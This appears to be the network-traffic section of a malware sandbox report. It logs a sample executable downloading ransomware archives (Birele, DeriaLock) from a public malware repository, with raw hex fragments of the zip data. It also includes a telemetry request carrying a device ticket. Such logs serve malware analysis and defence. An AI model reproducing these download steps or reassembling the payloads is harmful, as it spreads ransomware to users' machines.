                                                                                                                                                            2022-09-29 12:47:40 UTC39088INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            162192.168.2.649899185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:40 UTC39090OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            163185.199.108.133443192.168.2.649899C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:40 UTC39090INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 116134
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:47:40 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6942-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455661.789281,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 69b4b15b37aebde7ba299cc2cd1370902e882e61
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:52:40 GMT
                                                                                                                                                            Source-Age: 221
                                                                                                                                                            2022-09-29 12:47:40 UTC39091INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                            Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                            2022-09-29 12:47:40 UTC39107INData Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42
                                                                                                                                                            Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
                                                                                                                                                            2022-09-29 12:47:40 UTC39123INData Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12
                                                                                                                                                            Data Ascii: j[v?AGELw|Q.9|Br[Ky--0gNB|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^|C
                                                                                                                                                            2022-09-29 12:47:40 UTC39139INData Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c
                                                                                                                                                            Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
                                                                                                                                                            2022-09-29 12:47:40 UTC39155INData Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75
                                                                                                                                                            Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@|v_Hu
                                                                                                                                                            2022-09-29 12:47:40 UTC39171INData Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99
                                                                                                                                                            Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
                                                                                                                                                            2022-09-29 12:47:40 UTC39187INData Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac
                                                                                                                                                            Data Ascii: Nr\ep\CZco{It:+Smf1T*qN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ*0c^O3L~6|FOL Y[>P#!O)6"To};"Maa
                                                                                                                                                            2022-09-29 12:47:40 UTC39203INData Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08
                                                                                                                                                            Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            164192.168.2.64990520.42.65.92443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:48:03 UTC39204OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: MSDW
                                                                                                                                                            MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAcPkwu5CuAB7SMBMSR0vg4T2GTS736uQgZubBU70HwG+3eCDoCG4GUM8sTsgEBWu3nY3OtYeS4vzBd8BfrRg6yTBJpfLJjVhq6RpmRjIeeXuvrNOQr4a7wekuEm1aJWEsa4Pc+hZQ6fZaRBbOQsOVNRIqNVE8z9M1agLY9OcqvuEiDf//52Usd04foxLkWDFM80/1MM3M9wm0fC2sMtlRfy9Ue1IXWTUZXxpDsAc9WU97zBc19rHNDaxcZx1tSb/4XgmU9MUbgs1P8Qx6IelPdLjVy6vPJO+w4qkm2ENvWoNim3llQsv7LYevPNeYEBGMEsFMS1J+lLt+ZBQ/Hb+j7gDZgAACNk64fIdJpuXiAHCgAEWhQzyBn3+QDBdXX5NhaVxezC6TMcsfJefJLmfMIT3USPrihuwpRXekBx90tw4/fxdtAJX5VCFrinVPSPU6v7h/UBkETTfEgWc9YERODxnZvi/zpyJWFL1b9MTYTccha+VPv30gT9w85kxi7Jc0eKOEl+1wYWAhRnVINRSgK/mNlsVDRqcxsKrE0OpLt9K5EJigzDdhF8oM0ASLhkSDZTk3Xczz+xIUGLjAtVmYKvsePuE3jU6qNyNWGgIxJnUPdQZ58wnoBemECWLsa4hi2OBya5LqElwkPAzn8AEBaz61HrlFQsB8Oit8+pOGLQnjFp2PGpi7cqYHg6YkjHvzdu+/YD2maMJsolZPZTi4OzkN8C4EwCSQzC1g37gcT1ctrND2wl0tT9s4Bg+kGgLVVOOwoQscbl+Qlw8n6TyyimxMO4F9eX/bXyTSj7EoBX3dOzT5uIvoESsADRjr2FcezrZKIY0c5WzVg1qTbE0hrgBj2NchP7lSR2jX9USydn2qQqIuZQhpLgB&p=
                                                                                                                                                            Content-Length: 4626
                                                                                                                                                            Host: watson.telemetry.microsoft.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            17185.199.110.133443192.168.2.649716C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC702INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 215551
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:48 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6970-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455488.359610,VS0,VE4
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 60a27fd0174837436ddc3ab26d7496e4351f2b13
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:48 GMT
                                                                                                                                                            Source-Age: 37
                                                                                                                                                            2022-09-29 12:44:48 UTC702INData Raw: 50 4b 03 04 14 00 01 00 08 00 b9 44 9d 49 fb a7 08 f7 49 49 03 00 00 90 07 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 44 65 72 69 61 4c 6f 63 6b 2e 65 78 65 8f 5e c1 d2 4e 0d 5f 39 3e ec 9e 1a 00 e0 ba e5 f5 be 9e 96 4e e6 01 53 65 32 9c ef 35 79 aa 89 be e7 a1 c5 67 ef 92 69 5f 6a cd 1e 64 76 70 1a 6a aa 4b 9a fa 65 0d 36 ac dc 2d fa 18 41 f4 90 27 10 c4 f7 86 51 d7 e1 38 f9 19 23 6a 06 4f b5 90 c1 dd c3 23 3c 19 77 e3 44 06 84 ce 90 3c c2 c7 5f 60 30 36 92 57 7f 96 fa 21 09 c1 ef 1a 4b 1b dd 2c 93 f5 d6 b9 79 75 8a 42 65 ef 69 bf c5 84 8a 58 98 3b 72 e6 2b a7 c3 d9 22 01 60 13 a6 b8 0a 02 a3 ac 92 01 17 24 1f 36 a3 d5 4a 7e fc d3 56 64 b6 8b 10 96 4c 8b 86 ef 7b 8c dd af 2b b6 2c 1f b6 9f 38 6c 79 5c 08 53 02 ea be fc 69 9a ee fb 19 3c 74 bb 8d 5e
                                                                                                                                                            Data Ascii: PKDIIIEndermanch@DeriaLock.exe^N_9>NSe25ygi_jdvpjKe6-A'Q8#jO#<wD<_`06W!K,yuBeiX;r+"`$6J~VdL{+,8ly\Si<t^
                                                                                                                                                            2022-09-29 12:44:48 UTC704INData Raw: 94 c5 72 fa c2 61 fb 91 6f d4 4d 42 a4 e2 fd 95 ef a3 4a c6 21 f1 04 3c d2 65 f4 87 54 3b b1 d9 24 6b bb 53 35 98 8a 46 94 13 e5 e5 71 37 5e a0 a4 3f de 39 e4 f7 0f 6c ae 3b 7d e2 9f 02 68 e9 7a 0f 04 0f 84 99 12 17 84 40 6a 21 45 6e ab a8 1c ad 5b fd 63 f9 d6 b7 03 b3 08 85 3a ff 28 c3 ce f2 4e 28 9a 06 ba bd b1 c1 c6 1d 18 8c c8 75 9a 08 e7 6c 69 b8 f9 2c ac ff 76 1e 5e 31 2f 04 2d 59 0f 0a f1 3d ad fe da ff 60 35 1e 9f 9d fe a7 48 5e 42 0a b7 4a 71 86 b0 e6 0f 22 37 8f 61 c6 d8 4b 4e fd 68 7d 39 85 cc 2d 7f 8c 69 8b e4 87 12 20 eb ad ec ff 34 6a 74 ce a1 3f ea 35 4f b0 e6 0e 10 6e e4 e9 e4 09 a9 52 52 6e 8d d1 a3 dd 76 d9 20 a7 64 70 a8 c7 f8 a9 2e f1 15 0c b6 22 f1 61 65 01 fb 6e 71 61 84 fb 5d c9 b5 52 52 68 f3 91 fd 77 47 da 1b cc 5d 1a 62 0f 15 2e
                                                                                                                                                            Data Ascii: raoMBJ!<eT;$kS5Fq7^?9l;}hz@j!En[c:(N(uli,v^1/-Y=`5H^BJq"7aKNh}9-i 4jt?5OnRRnv dp."aenqa]RRhwG]b.
                                                                                                                                                            2022-09-29 12:44:48 UTC705INData Raw: cc 05 3d e1 b2 30 5b de b2 9b d9 d6 ea ab b5 85 1b 89 f4 ee de e4 8b 82 3a e3 6f 98 0e 69 a4 4a 2e 2a 96 04 cd 1b e0 65 13 c3 4a 40 9d 44 04 e8 a1 fb 80 50 b2 06 cc 12 bd 98 b4 82 db 35 c7 66 6b 16 d7 3f a8 61 a3 f5 3d 63 4d b6 f1 8f ef e0 0d 11 e8 2b 3e e4 4e a3 4a a5 d6 fe 96 93 dd 4c bc e2 8e 68 31 5b 64 91 7e f0 77 34 f8 29 a9 ab 7a 16 db 82 b8 5b a1 c1 7f 0a c5 b2 6c 46 82 28 54 17 10 1f dd 03 e2 4b 23 e9 5e 0d aa 2a 56 cd b9 dc 53 bf dd fc cf 38 80 26 02 b1 1b 19 b9 63 2d 94 8f e9 5a 65 0b 9a 0b 97 8d 9e 9d d0 9d 6e 52 5e 88 67 34 e3 cd ed a8 6a 1d 92 5c d2 ba 45 05 8e 75 6b 4d da 87 f9 0e f4 be fa 0f 3c 36 11 0e ab 28 64 11 7b 52 fb ce c0 43 99 2e 2a 72 6e 53 27 e6 59 7d 32 18 70 28 f6 1c c1 93 a0 10 cf 8c 1b 83 f0 f3 7d fe b9 c5 61 70 07 72 f1 4c
                                                                                                                                                            Data Ascii: =0[:oiJ.*eJ@DP5fk?a=cM+>NJLh1[d~w4)z[lF(TK#^*VS8&c-ZenR^g4j\EukM<6(d{RC.*rnS'Y}2p(}aprL
                                                                                                                                                            2022-09-29 12:44:48 UTC706INData Raw: 9b 61 d3 15 e1 24 fe 26 e5 91 eb af 6a 86 10 ed ae 06 0e 8f c4 a1 c0 45 4d 9d 33 c0 fd 40 f7 6d 09 4e cc ee 84 c9 07 3b 6d c4 21 7b 31 2a 1f 56 12 c6 e5 da ef e7 95 fd 9b d7 29 d7 fd 86 54 27 af ce 04 86 09 32 4a 79 6a 97 0a dd 2f 97 a1 08 e5 1e 72 35 5f 7d ec 5b 70 39 a1 01 2d a5 85 44 69 16 87 fd d4 2a 46 22 a0 93 ea 40 c5 22 f6 70 7d a8 05 a7 fa b2 23 0b 73 ce 0c 13 94 6d 09 29 37 be d8 50 30 c1 2f 01 b9 51 af 19 0a 7b 21 a1 54 df 6d 7b b9 c0 91 ee 4f bb 3b a8 7d f1 90 9a b6 e7 3e f4 d4 c1 e2 af 89 6c ef 9c 3d 2e 39 1a 79 d9 60 70 a8 21 26 6f 3f fc a7 13 c0 f3 77 5c e7 b4 ee c8 f5 a8 83 de 12 e7 3c cc 62 66 e2 86 53 6f df ec e9 b2 7d 3a f1 4f 95 7b a5 82 f0 47 04 43 b6 ef 99 e4 41 be 7d 82 25 0f c3 ab 00 8b 57 83 b0 9e 76 71 64 35 a7 63 1f d8 bc 8a 90
                                                                                                                                                            Data Ascii: a$&jEM3@mN;m!{1*V)T'2Jyj/r5_}[p9-Di*F"@"p}#sm)7P0/Q{!Tm{O;}>l=.9y`p!&o?w\<bfSo}:O{GCA}%Wvqd5c
                                                                                                                                                            2022-09-29 12:44:48 UTC708INData Raw: d3 e8 bb 24 8e f5 8a e1 3d cb 76 c8 f2 e8 a8 d7 25 e2 4c 09 4a ea fe 7b 03 31 32 30 a1 eb 9e 30 07 dc 62 14 e5 ae e8 1b cf b0 b7 9d 9e 36 15 47 9b 61 30 45 ad 52 eb 36 8c 12 62 37 23 77 9d 2b 5b 5d 30 2e 66 45 dc 82 54 b4 9f 25 0a 38 5c c7 1d 53 a7 a9 77 6c 83 be fe b8 44 29 da f2 53 f8 36 04 92 a3 8e 40 e1 ec cb fa d4 93 45 f0 ff 4a ee 63 d8 33 55 32 86 d0 f3 31 01 03 2e c0 c8 f7 44 87 17 f6 77 a0 ac fa 44 36 04 de 37 88 f2 00 78 86 35 f4 f8 e5 6b c3 e6 6c 6b 8a 05 d1 08 24 8f 37 16 71 80 b4 39 95 7a 03 0b 3f 78 4c 7a a2 e2 60 3a 37 03 8f 31 74 70 4a fd 2a 4c dd d2 4d d2 b2 07 8d 86 c5 a3 6f 4b 9c ca 33 c4 00 d9 92 3a 35 96 e8 9a bb c4 e5 47 32 0c de da 22 5b 09 fe 51 51 ad 1c 39 c0 8b 72 da 41 34 da 40 98 40 f7 8a 48 6f 7d 74 ee c3 8b de 61 de be 5c 1b
                                                                                                                                                            Data Ascii: $=v%LJ{1200b6Ga0ER6b7#w+[]0.fET%8\SwlD)S6@EJc3U21.DwD67x5klk$7q9z?xLz`:71tpJ*LMoK3:5G2"[QQ9rA4@@Ho}ta\
                                                                                                                                                            2022-09-29 12:44:48 UTC709INData Raw: 4c 6e 17 60 26 d6 b8 2e bc b8 0d 14 1e 68 07 de cf 2f 81 06 53 f1 d8 f3 11 de 51 ea 61 eb 05 13 7d 9a 74 47 4b 9b 5b 9b cb da 88 a7 70 b3 99 c4 db 0a 4d f6 1f 23 3f a4 4a c8 c6 87 5a d7 14 bf 84 8c e3 c2 2f 0d 54 60 01 d3 e3 25 94 bb e1 fa 9c 24 8e 24 b2 85 0f 8c 1c bf dd aa 8f 92 76 d5 10 55 e9 85 e7 3f a6 59 e6 50 ea 58 74 3e e9 36 81 7f 64 fa 3d 2d 78 01 5f 76 dc a2 aa 15 e9 21 58 84 62 54 a9 c2 c3 4f 8d 5e 92 7c f6 fc 53 88 79 83 10 94 e5 97 f1 da 66 01 50 66 eb e7 cf 9d da 9e 12 df 93 e5 d7 22 f3 de b2 12 d0 91 6d 2a 62 e1 b2 d3 0b 75 44 54 06 5e aa 8c 78 07 bc 88 1d a0 78 d6 16 59 a0 68 f6 5c ed 3e cf 43 03 b9 49 7f 13 40 00 25 6e 91 23 17 61 91 78 8e ed 54 1a d4 f0 ae 13 d1 99 ef 2a 27 e5 c3 89 c7 db 69 dc 5e ab ab 84 46 e2 f8 0d a2 33 db c1 f2 18
                                                                                                                                                            Data Ascii: Ln`&.h/SQa}tGK[pM#?JZ/T`%$$vU?YPXt>6d=-x_v!XbTO^|SyfPf"m*buDT^xxYh\>CI@%n#axT*'i^F3
